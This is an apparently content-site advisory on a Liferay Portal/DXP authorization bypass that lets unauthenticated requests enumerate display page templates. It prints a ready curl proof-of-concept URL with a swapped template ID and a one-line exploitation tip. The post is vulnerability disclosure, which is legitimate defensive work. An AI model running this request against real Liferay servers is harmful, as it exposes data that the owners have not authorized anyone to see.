Listen to this Post
The vulnerability exists within the display page template viewing functionality. A specific endpoint responsible for rendering these templates fails to implement proper authorization checks. When a remote attacker sends a crafted HTTP GET request with a modified template ID parameter, the application does not verify if the user has the required ‘VIEW’ permission. Instead of returning an access denied error, the server processes the request and returns the sensitive template data, which can include layout configurations and metadata, directly to the unauthorized user. This flaw allows for the enumeration and disclosure of all display page templates within the application.
Platform: Liferay Portal/DXP
Version: 7.3.0 – 7.4.3.111
Vulnerability: Authorization Bypass
Severity: Moderate
date: 2025-09-16
Prediction: 2025-10-14
What Undercode Say:
`curl -s “http://target/group/control_panel/manage?p_p_id=com_liferay_layout_page_template_admin_web_portlet_LayoutPageTemplatesPortlet&_com_liferay_layout_page_template_admin_web_portlet_LayoutPageTemplatesPortlet_mvcRenderCommandName=%2Flayout_page_template%2Fedit_display_page_template&_com_liferay_layout_page_template_admin_web_portlet_LayoutPageTemplatesPortlet_layoutPageTemplateEntryId=12345″`
How Exploit:
Craft URL with template ID.
Protection from this CVE
Apply vendor patch.
Impact:
Sensitive information disclosure.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

